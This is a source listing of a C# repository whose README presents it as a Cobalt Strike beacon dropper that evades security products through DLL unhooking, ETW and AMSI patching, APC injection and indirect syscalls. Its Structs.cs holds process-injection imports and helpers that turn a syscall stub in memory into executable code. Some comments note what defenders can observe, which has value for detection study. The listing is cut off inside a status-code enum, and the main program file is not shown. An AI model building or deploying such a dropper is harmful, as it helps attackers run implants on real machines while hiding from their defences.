├── .gitattributes
├── Program.cs
├── README.md
├── SharpVenoma.csproj
├── SharpVenoma.csproj.user
├── SharpVenoma.sln
├── Structs.cs
├── aes.py
└── assets
├── edr1.png
├── edr2.png
├── payload_encode.png
└── payload_update.png
/.gitattributes:
--------------------------------------------------------------------------------
1 | # Auto detect text files and perform LF normalization
2 | * text=auto
3 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # SharpVenoma
2 |
3 |
4 |
5 |

6 |
7 |
8 | C# reimplementation of Venoma
9 |
10 |
11 |
Another C# Cobalt Strike beacon dropper with custom indirect syscalls execution
12 |
13 |
14 |
15 |
16 |

17 |

18 |
19 |
20 |
21 | > A custom CSharp raw beacon dropper with :
22 | > DLL Unhooking (Perun's fart)
23 | > ETW Patching
24 | > AMSI Patching
25 | > EnumPageFilesW execution
26 | > Early Bird APC Execution
27 | > Indirect syscall execution
28 | >
29 |
30 | All functions are included, choose what you need and remove anything else before compiling.
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 | ## Usage
39 |
40 | Generate your raw payload and use the aes.py file to encrypt the data :
41 | 
42 | Update the source code and choose what you want to execute :
43 | 
44 |
45 |
46 |
47 |
48 |
49 |
--------------------------------------------------------------------------------
/SharpVenoma.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | net8.0-windows
6 | enable
7 | enable
8 | SharpVenoma.Program
9 | x64
10 | True
11 |
12 |
13 |
14 |
--------------------------------------------------------------------------------
/SharpVenoma.csproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | <_LastSelectedProfileId>C:\Users\Utilisateur\source\repos\SharpVenoma\Properties\PublishProfiles\FolderProfile.pubxml
5 |
6 |
--------------------------------------------------------------------------------
/SharpVenoma.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.9.34723.18
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpVenoma", "SharpVenoma.csproj", "{54D1C4C4-4EAC-46A5-9F2B-775436ADB6E1}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {54D1C4C4-4EAC-46A5-9F2B-775436ADB6E1}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {54D1C4C4-4EAC-46A5-9F2B-775436ADB6E1}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {54D1C4C4-4EAC-46A5-9F2B-775436ADB6E1}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {54D1C4C4-4EAC-46A5-9F2B-775436ADB6E1}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {22D8D125-591C-4113-A010-2F550CE4C7C3}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/Structs.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.ComponentModel;
4 | using System.Diagnostics;
5 | using System.Linq;
6 | using System.Net.NetworkInformation;
7 | using System.Runtime.InteropServices;
8 | using System.Text;
9 | using System.Threading.Tasks;
10 | using static SharpVenoma.Structs.Delegates;
11 |
12 | namespace SharpVenoma
13 | {
14 | internal class Structs
15 | {
16 |
/// <summary>
/// Unmanaged-function-pointer signature for ntdll NtProtectVirtualMemory (BaseAddress and
/// RegionSize are in/out, hence <c>ref</c>). Declared at class level rather than inside
/// <c>Delegates</c>; no member visible in this file references it, so its caller lives elsewhere
/// in the project.
/// </summary>
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
public delegate UInt32 NtProtectVirtualMemoryDelegate(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr RegionSize, UInt32 NewProtect, ref UInt32 OldProtect);
19 |
/// <summary>
/// P/Invoke for kernel32 CreateProcess. No CharSet is given, so the string parameters use the
/// DllImport default (ANSI) marshalling. <c>STARTUPINFO</c> and <c>PROCESS_INFORMATION</c> are
/// declared outside this file. Returns false on failure; SetLastError is not set here, so
/// Marshal.GetLastWin32Error() is not reliable after this call.
/// </summary>
[DllImport("kernel32.dll")]
public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, ref PROCESS_INFORMATION lpProcessInformation);
22 |
/// <summary>
/// P/Invoke bound explicitly to the wide-character export GetModuleHandleW. Returns the base
/// address of an already-loaded module, or IntPtr.Zero (with SetLastError populated) when the
/// module is not mapped in this process.
/// </summary>
[DllImport("kernel32.dll", EntryPoint = "GetModuleHandleW", SetLastError = true)]
public static extern IntPtr GetModuleHandle(string moduleName);
25 |
/// <summary>
/// P/Invoke for kernel32 ReadProcessMemory. <c>lpBuffer</c> is marshalled as an output buffer of
/// <c>dwSize</c> bytes; the count actually copied comes back in <c>lpNumberOfBytesRead</c>.
/// Returns false on failure, with the Win32 error retrievable via Marshal.GetLastWin32Error().
/// </summary>
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, [Out] byte[] lpBuffer, int dwSize, out IntPtr lpNumberOfBytesRead);
28 |
/// <summary>
/// P/Invoke for kernel32 VirtualAlloc (current process). <c>flAllocationType</c> and
/// <c>flProtect</c> take the raw MEM_* / PAGE_* values; see <c>AllocationType</c> and
/// <c>AllocationProtect</c> in this class. Returns IntPtr.Zero on failure.
/// </summary>
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, int dwSize, uint flAllocationType, uint flProtect);
31 |
/// <summary>
/// P/Invoke for kernel32 VirtualAllocEx (allocation in another process identified by
/// <c>hProcess</c>). Returns IntPtr.Zero on failure; SetLastError is not set on this
/// declaration, unlike <c>VirtualAlloc</c> above.
/// </summary>
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, Int32 dwSize, UInt32 flAllocationType, UInt32 flProtect);
34 |
/// <summary>
/// P/Invoke for kernel32 WriteProcessMemory. <c>lpNumberOfBytesWritten</c> is <c>ref</c>, so a
/// pointer is always passed (the native API also accepts NULL, which this signature cannot
/// express). Returns false on failure.
/// </summary>
[DllImport("kernel32.dll")]
public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, ref IntPtr lpNumberOfBytesWritten);
37 |
/// <summary>
/// P/Invoke for kernel32 VirtualProtect (current process). The previous page protection is
/// returned through <c>lpflOldProtect</c>; the return value is false when the change failed.
/// </summary>
[DllImport("kernel32.dll")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
40 |
/// <summary>
/// P/Invoke for kernel32 VirtualProtectEx. Used by the three Indirect* helpers in this class,
/// all of which pass the current process handle and discard both the return value and
/// <c>lpflOldProtect</c>, so a failed protection change is not observed by them.
/// </summary>
[DllImport("kernel32.dll")]
public static extern bool VirtualProtectEx(IntPtr handle, IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
43 |
/// <summary>
/// P/Invoke for kernel32 QueueUserAPC. Declared here with an IntPtr return, although the Win32
/// prototype returns a DWORD; in either reading, zero means the APC was not queued. The README's
/// "Early Bird APC" item corresponds to this import; no caller is visible in this file.
/// </summary>
[DllImport("kernel32.dll")]
public static extern IntPtr QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData);
46 |
/// <summary>
/// P/Invoke for kernel32 ResumeThread. Returns the thread's previous suspend count, or
/// 0xFFFFFFFF on failure.
/// </summary>
[DllImport("kernel32.dll")]
public static extern uint ResumeThread(IntPtr hThread);
49 |
/// <summary>
/// P/Invoke for psapi EnumPageFilesW. The callback is passed as a raw function pointer rather
/// than a typed delegate, so the caller alone is responsible for the pointed-to code being alive
/// and executable for the duration of the call. No caller is visible in this file. From a
/// detection standpoint, a <c>pCallBackRoutine</c> that does not point into a loaded module is
/// the observable for this path.
/// </summary>
[DllImport("psapi.dll")]
public static extern bool EnumPageFilesW(IntPtr pCallBackRoutine, IntPtr pContext);
52 |
53 |
54 |
55 |
/// <summary>
/// Delegate signatures for the ntdll routines that the Indirect* helpers in this class bind to
/// via Marshal.GetDelegateForFunctionPointer. The struct holds no instance state; it is used
/// purely as a naming scope (and is brought into scope with <c>using static</c> at the top of
/// the file).
/// </summary>
public struct Delegates
{
    /// <summary>
    /// NtAllocateVirtualMemory. <c>BaseAddress</c> and <c>RegionSize</c> are in/out, hence
    /// <c>ref</c>. <c>AllocationType</c> and <c>Protect</c> are declared as <c>ulong</c>; the
    /// helper that invokes this delegate passes <c>uint</c> values, which widen implicitly.
    /// </summary>
    [UnmanagedFunctionPointer(CallingConvention.StdCall)]
    public delegate NTSTATUS NtAllocateVirtualMemory(
        IntPtr ProcessHandle,
        ref IntPtr BaseAddress,
        IntPtr ZeroBits,
        ref UIntPtr RegionSize,
        ulong AllocationType,
        ulong Protect);

    /// <summary>
    /// NtCreateThreadEx. <c>hThread</c> receives the new thread handle. <c>CreateSuspended</c> is
    /// a C# <c>bool</c>, which marshals as a 4-byte BOOL by default.
    /// </summary>
    [UnmanagedFunctionPointer(CallingConvention.StdCall)]
    public delegate NTSTATUS NtCreateThreadEx(
        out IntPtr hThread,
        ACCESS_MASK DesiredAccess,
        IntPtr ObjectAttributes,
        IntPtr ProcessHandle,
        IntPtr lpStartAddress,
        IntPtr lpParameter,
        bool CreateSuspended,
        uint StackZeroBits,
        uint SizeOfStackCommit,
        uint SizeOfStackReserve,
        IntPtr lpBytesBuffer
    );

    /// <summary>
    /// NtWaitForSingleObject. All three arguments are passed straight through by
    /// <c>IndirectNtWaitForSingleObject</c>.
    /// </summary>
    [UnmanagedFunctionPointer(CallingConvention.StdCall)]
    public delegate NTSTATUS NtWaitForSingleObject(IntPtr Object, bool Alertable, uint Timeout);
}
83 |
84 |
85 |
86 |
87 |
88 |
89 |
/// <summary>
/// Invokes NtAllocateVirtualMemory through the code bytes held in <c>Program.IndirectSyscallStub</c>
/// (defined outside this file) instead of through the ntdll export. The managed byte[] is pinned,
/// the page it lives on is switched to PAGE_EXECUTE_READWRITE, and a
/// <c>Delegates.NtAllocateVirtualMemory</c> is created over the pinned address and called with the
/// arguments passed straight through.
/// </summary>
/// <param name="ProcessHandle">Target process handle.</param>
/// <param name="BaseAddress">In/out base address, as in the native call.</param>
/// <param name="ZeroBits">Passed through unchanged.</param>
/// <param name="RegionSize">In/out region size, as in the native call.</param>
/// <param name="AllocationType">Passed through; widened to ulong by the delegate signature.</param>
/// <param name="Protect">Passed through; widened to ulong by the delegate signature.</param>
/// <returns>The NTSTATUS produced by the stub.</returns>
/// <remarks>
/// Review notes: the VirtualProtectEx return value and <c>oldprotect</c> are discarded, and the
/// <c>Process</c> returned by Process.GetCurrentProcess() is IDisposable but never disposed. The
/// stub is assumed to already contain valid code — how it is populated is not visible here. From a
/// detection standpoint the observable is a private (GC-heap) page transitioning to RWX
/// immediately before a kernel call whose return address most likely lies in that heap page rather
/// than in a loaded module.
/// </remarks>
public static NTSTATUS IndirectNtAllocateVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref UIntPtr RegionSize, uint AllocationType, uint Protect)
{
    byte[] syscall = Program.IndirectSyscallStub;
    unsafe
    {
        // Pin the stub so the address handed to the delegate stays valid for the call.
        fixed (byte* ptr = syscall)
        {
            IntPtr memoryAddress = (IntPtr)ptr;
            // Result and previous protection are not checked.
            VirtualProtectEx(Process.GetCurrentProcess().Handle, memoryAddress, (UIntPtr)syscall.Length, (uint)AllocationProtect.PAGE_EXECUTE_READWRITE, out uint oldprotect);
            Delegates.NtAllocateVirtualMemory assembledFunction = (Delegates.NtAllocateVirtualMemory)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.NtAllocateVirtualMemory));
            return (NTSTATUS)assembledFunction(ProcessHandle, ref BaseAddress, ZeroBits, ref RegionSize, AllocationType, Protect);
        }
    }
}
101 |
/// <summary>
/// Invokes NtCreateThreadEx through <c>Program.IndirectSyscallStub</c> (defined outside this
/// file), using the same pin / set-RWX / build-delegate sequence as
/// <c>IndirectNtAllocateVirtualMemory</c>. Every argument is passed straight through to the
/// <c>Delegates.NtCreateThreadEx</c> delegate.
/// </summary>
/// <param name="hThread">Receives the created thread handle.</param>
/// <returns>The NTSTATUS produced by the stub.</returns>
/// <remarks>
/// Review notes: the VirtualProtectEx return value and <c>oldprotect</c> are discarded, and the
/// <c>Process</c> from Process.GetCurrentProcess() is never disposed. The stub contents are not
/// visible in this file. Detection-wise, this is a thread creation whose call chain passes
/// through a non-image (GC-heap) RWX page.
/// </remarks>
public static NTSTATUS IndirectNtCreateThreadEx(out IntPtr hThread, ACCESS_MASK DesiredAccess, IntPtr ObjectAttributes, IntPtr ProcessHandle, IntPtr lpStartAddress, IntPtr lpParameter, bool CreateSuspended, uint StackZeroBits, uint SizeOfStackCommit, uint SizeOfStackReserve, IntPtr lpBytesBuffer)
{
    byte[] syscall = Program.IndirectSyscallStub;
    unsafe
    {
        // Pin the stub so the address handed to the delegate stays valid for the call.
        fixed (byte* ptr = syscall)
        {
            IntPtr memoryAddress = (IntPtr)ptr;
            // Result and previous protection are not checked.
            VirtualProtectEx(Process.GetCurrentProcess().Handle, memoryAddress, (UIntPtr)syscall.Length, (uint)AllocationProtect.PAGE_EXECUTE_READWRITE, out uint oldprotect);
            Delegates.NtCreateThreadEx assembledFunction = (Delegates.NtCreateThreadEx)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.NtCreateThreadEx));
            return (NTSTATUS)assembledFunction(out hThread, DesiredAccess, ObjectAttributes, ProcessHandle, lpStartAddress, lpParameter, CreateSuspended, StackZeroBits, SizeOfStackCommit, SizeOfStackReserve, lpBytesBuffer);
        }
    }
}
114 |
115 |
/// <summary>
/// Invokes NtWaitForSingleObject through <c>Program.IndirectSyscallStub</c> (defined outside this
/// file), using the same pin / set-RWX / build-delegate sequence as
/// <c>IndirectNtAllocateVirtualMemory</c>. The three arguments are passed straight through to the
/// <c>Delegates.NtWaitForSingleObject</c> delegate.
/// </summary>
/// <returns>The NTSTATUS produced by the stub (e.g. <c>NTSTATUS.Wait0</c> or <c>NTSTATUS.Timeout</c>).</returns>
/// <remarks>
/// Review notes: the VirtualProtectEx return value and <c>oldprotect</c> are discarded, and the
/// <c>Process</c> from Process.GetCurrentProcess() is never disposed. The stub contents are not
/// visible in this file.
/// </remarks>
public static NTSTATUS IndirectNtWaitForSingleObject(IntPtr Object, bool Alertable, uint Timeout)
{
    byte[] syscall = Program.IndirectSyscallStub;
    unsafe
    {
        // Pin the stub so the address handed to the delegate stays valid for the call.
        fixed (byte* ptr = syscall)
        {
            IntPtr memoryAddress = (IntPtr)ptr;
            // Result and previous protection are not checked.
            VirtualProtectEx(Process.GetCurrentProcess().Handle, memoryAddress, (UIntPtr)syscall.Length, (uint)AllocationProtect.PAGE_EXECUTE_READWRITE, out uint oldprotect);
            Delegates.NtWaitForSingleObject assembledFunction = (Delegates.NtWaitForSingleObject)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.NtWaitForSingleObject));
            return (NTSTATUS)assembledFunction(Object, Alertable, Timeout);
        }
    }
}
127 |
128 |
129 |
130 |
131 |
132 |
133 |
/// <summary>
/// Win32 ACCESS_MASK bits (winnt.h / winuser.h values), used as the <c>DesiredAccess</c> of
/// <c>Delegates.NtCreateThreadEx</c>. Several names intentionally share a value —
/// STANDARD_RIGHTS_READ / WRITE / EXECUTE all equal READ_CONTROL, and the DESKTOP_* and WINSTA_*
/// groups overlap — so <c>ToString()</c> on a combined mask may print any of the aliases;
/// compare numerically rather than by name.
/// </summary>
[Flags]
public enum ACCESS_MASK : uint
{
    // Standard rights (upper 16 bits)
    DELETE = 0x00010000,
    READ_CONTROL = 0x00020000,
    WRITE_DAC = 0x00040000,
    WRITE_OWNER = 0x00080000,
    SYNCHRONIZE = 0x00100000,
    STANDARD_RIGHTS_REQUIRED = 0x000F0000,
    STANDARD_RIGHTS_READ = 0x00020000,
    STANDARD_RIGHTS_WRITE = 0x00020000,
    STANDARD_RIGHTS_EXECUTE = 0x00020000,
    STANDARD_RIGHTS_ALL = 0x001F0000,
    SPECIFIC_RIGHTS_ALL = 0x0000FFFF,
    ACCESS_SYSTEM_SECURITY = 0x01000000,
    MAXIMUM_ALLOWED = 0x02000000,
    // Generic rights
    GENERIC_READ = 0x80000000,
    GENERIC_WRITE = 0x40000000,
    GENERIC_EXECUTE = 0x20000000,
    GENERIC_ALL = 0x10000000,
    // Desktop-object specific rights (low 16 bits)
    DESKTOP_READOBJECTS = 0x00000001,
    DESKTOP_CREATEWINDOW = 0x00000002,
    DESKTOP_CREATEMENU = 0x00000004,
    DESKTOP_HOOKCONTROL = 0x00000008,
    DESKTOP_JOURNALRECORD = 0x00000010,
    DESKTOP_JOURNALPLAYBACK = 0x00000020,
    DESKTOP_ENUMERATE = 0x00000040,
    DESKTOP_WRITEOBJECTS = 0x00000080,
    DESKTOP_SWITCHDESKTOP = 0x00000100,
    // Window-station specific rights (low 16 bits; overlap the DESKTOP_* values)
    WINSTA_ENUMDESKTOPS = 0x00000001,
    WINSTA_READATTRIBUTES = 0x00000002,
    WINSTA_ACCESSCLIPBOARD = 0x00000004,
    WINSTA_CREATEDESKTOP = 0x00000008,
    WINSTA_WRITEATTRIBUTES = 0x00000010,
    WINSTA_ACCESSGLOBALATOMS = 0x00000020,
    WINSTA_EXITWINDOWS = 0x00000040,
    WINSTA_ENUMERATE = 0x00000100,
    WINSTA_READSCREEN = 0x00000200,
    WINSTA_ALL_ACCESS = 0x0000037F
}
174 |
/// <summary>
/// MEM_* allocation-type flags (winnt.h values) for VirtualAlloc / VirtualAllocEx and the
/// <c>AllocationType</c> argument of NtAllocateVirtualMemory. The underlying type is
/// <c>ulong</c> to match the <c>Delegates.NtAllocateVirtualMemory</c> signature; the P/Invoke
/// declarations in this class take <c>uint</c>, so a cast is needed when passing these to them.
/// </summary>
[Flags]
public enum AllocationType : ulong
{
    Commit = 0x1000,
    Reserve = 0x2000,
    Decommit = 0x4000,
    Release = 0x8000,
    Reset = 0x80000,
    Physical = 0x400000,
    TopDown = 0x100000,
    WriteWatch = 0x200000,
    LargePages = 0x20000000
}
188 |
/// <summary>
/// PAGE_* memory-protection constants (winnt.h values). The Indirect* helpers in this class use
/// <c>PAGE_EXECUTE_READWRITE</c> on the syscall stub page. PAGE_GUARD, PAGE_NOCACHE and
/// PAGE_WRITECOMBINE are modifiers OR'ed with a base protection in Win32; because this enum is
/// not marked [Flags], such combinations format as raw numbers. An identical copy exists later in
/// this file as <c>AllocationProtectEnum</c>.
/// </summary>
public enum AllocationProtect : uint
{
    PAGE_EXECUTE = 0x00000010,
    PAGE_EXECUTE_READ = 0x00000020,
    PAGE_EXECUTE_READWRITE = 0x00000040,
    PAGE_EXECUTE_WRITECOPY = 0x00000080,
    PAGE_NOACCESS = 0x00000001,
    PAGE_READONLY = 0x00000002,
    PAGE_READWRITE = 0x00000004,
    PAGE_WRITECOPY = 0x00000008,
    PAGE_GUARD = 0x00000100,
    PAGE_NOCACHE = 0x00000200,
    PAGE_WRITECOMBINE = 0x00000400
}
203 |
/// <summary>
/// NTSTATUS codes returned by the Nt* delegates and Indirect* helpers in this class. The top two
/// bits carry the severity — 0x0 success, 0x4 informational, 0x8 warning, 0xC error — which is how
/// the sections below are grouped. Several names alias the same value (Success/Wait0,
/// Abandoned/AbandonedWait0, Informational/ObjectNameExists), so <c>ToString()</c> on those values
/// is not guaranteed to pick a particular name; compare values, not names.
/// </summary>
public enum NTSTATUS : uint
{
    // Success
    Success = 0x00000000,
    Wait0 = 0x00000000,
    Wait1 = 0x00000001,
    Wait2 = 0x00000002,
    Wait3 = 0x00000003,
    Wait63 = 0x0000003f,
    Abandoned = 0x00000080,
    AbandonedWait0 = 0x00000080,
    AbandonedWait1 = 0x00000081,
    AbandonedWait2 = 0x00000082,
    AbandonedWait3 = 0x00000083,
    AbandonedWait63 = 0x000000bf,
    UserApc = 0x000000c0,
    KernelApc = 0x00000100,
    Alerted = 0x00000101,
    Timeout = 0x00000102,
    Pending = 0x00000103,
    Reparse = 0x00000104,
    MoreEntries = 0x00000105,
    NotAllAssigned = 0x00000106,
    SomeNotMapped = 0x00000107,
    OpLockBreakInProgress = 0x00000108,
    VolumeMounted = 0x00000109,
    RxActCommitted = 0x0000010a,
    NotifyCleanup = 0x0000010b,
    NotifyEnumDir = 0x0000010c,
    NoQuotasForAccount = 0x0000010d,
    PrimaryTransportConnectFailed = 0x0000010e,
    PageFaultTransition = 0x00000110,
    PageFaultDemandZero = 0x00000111,
    PageFaultCopyOnWrite = 0x00000112,
    PageFaultGuardPage = 0x00000113,
    PageFaultPagingFile = 0x00000114,
    CrashDump = 0x00000116,
    ReparseObject = 0x00000118,
    NothingToTerminate = 0x00000122,
    ProcessNotInJob = 0x00000123,
    ProcessInJob = 0x00000124,
    ProcessCloned = 0x00000129,
    FileLockedWithOnlyReaders = 0x0000012a,
    FileLockedWithWriters = 0x0000012b,

    // Informational
    Informational = 0x40000000,
    ObjectNameExists = 0x40000000,
    ThreadWasSuspended = 0x40000001,
    WorkingSetLimitRange = 0x40000002,
    ImageNotAtBase = 0x40000003,
    RegistryRecovered = 0x40000009,

    // Warning
    Warning = 0x80000000,
    GuardPageViolation = 0x80000001,
    DatatypeMisalignment = 0x80000002,
    Breakpoint = 0x80000003,
    SingleStep = 0x80000004,
    BufferOverflow = 0x80000005,
    NoMoreFiles = 0x80000006,
    HandlesClosed = 0x8000000a,
    PartialCopy = 0x8000000d,
    DeviceBusy = 0x80000011,
    InvalidEaName = 0x80000013,
    EaListInconsistent = 0x80000014,
    NoMoreEntries = 0x8000001a,
    LongJump = 0x80000026,
    DllMightBeInsecure = 0x8000002b,

    // Error
    Error = 0xc0000000,
    Unsuccessful = 0xc0000001,
    NotImplemented = 0xc0000002,
    InvalidInfoClass = 0xc0000003,
    InfoLengthMismatch = 0xc0000004,
    AccessViolation = 0xc0000005,
    InPageError = 0xc0000006,
    PagefileQuota = 0xc0000007,
    InvalidHandle = 0xc0000008,
    BadInitialStack = 0xc0000009,
    BadInitialPc = 0xc000000a,
    InvalidCid = 0xc000000b,
    TimerNotCanceled = 0xc000000c,
    InvalidParameter = 0xc000000d,
    NoSuchDevice = 0xc000000e,
    NoSuchFile = 0xc000000f,
    InvalidDeviceRequest = 0xc0000010,
    EndOfFile = 0xc0000011,
    WrongVolume = 0xc0000012,
    NoMediaInDevice = 0xc0000013,
    NoMemory = 0xc0000017,
    NotMappedView = 0xc0000019,
    UnableToFreeVm = 0xc000001a,
    UnableToDeleteSection = 0xc000001b,
    IllegalInstruction = 0xc000001d,
    AlreadyCommitted = 0xc0000021,
    AccessDenied = 0xc0000022,
    BufferTooSmall = 0xc0000023,
    ObjectTypeMismatch = 0xc0000024,
    NonContinuableException = 0xc0000025,
    BadStack = 0xc0000028,
    NotLocked = 0xc000002a,
    NotCommitted = 0xc000002d,
    InvalidParameterMix = 0xc0000030,
    ObjectNameInvalid = 0xc0000033,
    ObjectNameNotFound = 0xc0000034,
    ObjectNameCollision = 0xc0000035,
    ObjectPathInvalid = 0xc0000039,
    ObjectPathNotFound = 0xc000003a,
    ObjectPathSyntaxBad = 0xc000003b,
    DataOverrun = 0xc000003c,
    DataLate = 0xc000003d,
    DataError = 0xc000003e,
    CrcError = 0xc000003f,
    SectionTooBig = 0xc0000040,
    PortConnectionRefused = 0xc0000041,
    InvalidPortHandle = 0xc0000042,
    SharingViolation = 0xc0000043,
    QuotaExceeded = 0xc0000044,
    InvalidPageProtection = 0xc0000045,
    MutantNotOwned = 0xc0000046,
    SemaphoreLimitExceeded = 0xc0000047,
    PortAlreadySet = 0xc0000048,
    SectionNotImage = 0xc0000049,
    SuspendCountExceeded = 0xc000004a,
    ThreadIsTerminating = 0xc000004b,
    BadWorkingSetLimit = 0xc000004c,
    IncompatibleFileMap = 0xc000004d,
    SectionProtection = 0xc000004e,
    EasNotSupported = 0xc000004f,
    EaTooLarge = 0xc0000050,
    NonExistentEaEntry = 0xc0000051,
    NoEasOnFile = 0xc0000052,
    EaCorruptError = 0xc0000053,
    FileLockConflict = 0xc0000054,
    LockNotGranted = 0xc0000055,
    DeletePending = 0xc0000056,
    CtlFileNotSupported = 0xc0000057,
    UnknownRevision = 0xc0000058,
    RevisionMismatch = 0xc0000059,
    InvalidOwner = 0xc000005a,
    InvalidPrimaryGroup = 0xc000005b,
    NoImpersonationToken = 0xc000005c,
    CantDisableMandatory = 0xc000005d,
    NoLogonServers = 0xc000005e,
    NoSuchLogonSession = 0xc000005f,
    NoSuchPrivilege = 0xc0000060,
    PrivilegeNotHeld = 0xc0000061,
    InvalidAccountName = 0xc0000062,
    UserExists = 0xc0000063,
    NoSuchUser = 0xc0000064,
    GroupExists = 0xc0000065,
    NoSuchGroup = 0xc0000066,
    MemberInGroup = 0xc0000067,
    MemberNotInGroup = 0xc0000068,
    LastAdmin = 0xc0000069,
    WrongPassword = 0xc000006a,
    IllFormedPassword = 0xc000006b,
    PasswordRestriction = 0xc000006c,
    LogonFailure = 0xc000006d,
    AccountRestriction = 0xc000006e,
    InvalidLogonHours = 0xc000006f,
    InvalidWorkstation = 0xc0000070,
    PasswordExpired = 0xc0000071,
    AccountDisabled = 0xc0000072,
    NoneMapped = 0xc0000073,
    TooManyLuidsRequested = 0xc0000074,
    LuidsExhausted = 0xc0000075,
    InvalidSubAuthority = 0xc0000076,
    InvalidAcl = 0xc0000077,
    InvalidSid = 0xc0000078,
    InvalidSecurityDescr = 0xc0000079,
    ProcedureNotFound = 0xc000007a,
    InvalidImageFormat = 0xc000007b,
    NoToken = 0xc000007c,
    BadInheritanceAcl = 0xc000007d,
    RangeNotLocked = 0xc000007e,
    DiskFull = 0xc000007f,
    ServerDisabled = 0xc0000080,
    ServerNotDisabled = 0xc0000081,
    TooManyGuidsRequested = 0xc0000082,
    GuidsExhausted = 0xc0000083,
    InvalidIdAuthority = 0xc0000084,
    AgentsExhausted = 0xc0000085,
    InvalidVolumeLabel = 0xc0000086,
    SectionNotExtended = 0xc0000087,
    NotMappedData = 0xc0000088,
    ResourceDataNotFound = 0xc0000089,
    ResourceTypeNotFound = 0xc000008a,
    ResourceNameNotFound = 0xc000008b,
    ArrayBoundsExceeded = 0xc000008c,
    FloatDenormalOperand = 0xc000008d,
    FloatDivideByZero = 0xc000008e,
    FloatInexactResult = 0xc000008f,
    FloatInvalidOperation = 0xc0000090,
    FloatOverflow = 0xc0000091,
    FloatStackCheck = 0xc0000092,
    FloatUnderflow = 0xc0000093,
    IntegerDivideByZero = 0xc0000094,
    IntegerOverflow = 0xc0000095,
    PrivilegedInstruction = 0xc0000096,
    TooManyPagingFiles = 0xc0000097,
    FileInvalid = 0xc0000098,
    InstanceNotAvailable = 0xc00000ab,
    PipeNotAvailable = 0xc00000ac,
    InvalidPipeState = 0xc00000ad,
    PipeBusy = 0xc00000ae,
    IllegalFunction = 0xc00000af,
    PipeDisconnected = 0xc00000b0,
    PipeClosing = 0xc00000b1,
    PipeConnected = 0xc00000b2,
    PipeListening = 0xc00000b3,
    InvalidReadMode = 0xc00000b4,
    IoTimeout = 0xc00000b5,
    FileForcedClosed = 0xc00000b6,
    ProfilingNotStarted = 0xc00000b7,
    ProfilingNotStopped = 0xc00000b8,
    NotSameDevice = 0xc00000d4,
    FileRenamed = 0xc00000d5,
    CantWait = 0xc00000d8,
    PipeEmpty = 0xc00000d9,
    CantTerminateSelf = 0xc00000db,
    InternalError = 0xc00000e5,
    InvalidParameter1 = 0xc00000ef,
    InvalidParameter2 = 0xc00000f0,
    InvalidParameter3 = 0xc00000f1,
    InvalidParameter4 = 0xc00000f2,
    InvalidParameter5 = 0xc00000f3,
    InvalidParameter6 = 0xc00000f4,
    InvalidParameter7 = 0xc00000f5,
    InvalidParameter8 = 0xc00000f6,
    InvalidParameter9 = 0xc00000f7,
    InvalidParameter10 = 0xc00000f8,
    InvalidParameter11 = 0xc00000f9,
    InvalidParameter12 = 0xc00000fa,
    MappedFileSizeZero = 0xc000011e,
    TooManyOpenedFiles = 0xc000011f,
    Cancelled = 0xc0000120,
    CannotDelete = 0xc0000121,
    InvalidComputerName = 0xc0000122,
    FileDeleted = 0xc0000123,
    SpecialAccount = 0xc0000124,
    SpecialGroup = 0xc0000125,
    SpecialUser = 0xc0000126,
    MembersPrimaryGroup = 0xc0000127,
    FileClosed = 0xc0000128,
    TooManyThreads = 0xc0000129,
    ThreadNotInProcess = 0xc000012a,
    TokenAlreadyInUse = 0xc000012b,
    PagefileQuotaExceeded = 0xc000012c,
    CommitmentLimit = 0xc000012d,
    InvalidImageLeFormat = 0xc000012e,
    InvalidImageNotMz = 0xc000012f,
    InvalidImageProtect = 0xc0000130,
    InvalidImageWin16 = 0xc0000131,
    LogonServer = 0xc0000132,
    DifferenceAtDc = 0xc0000133,
    SynchronizationRequired = 0xc0000134,
    DllNotFound = 0xc0000135,
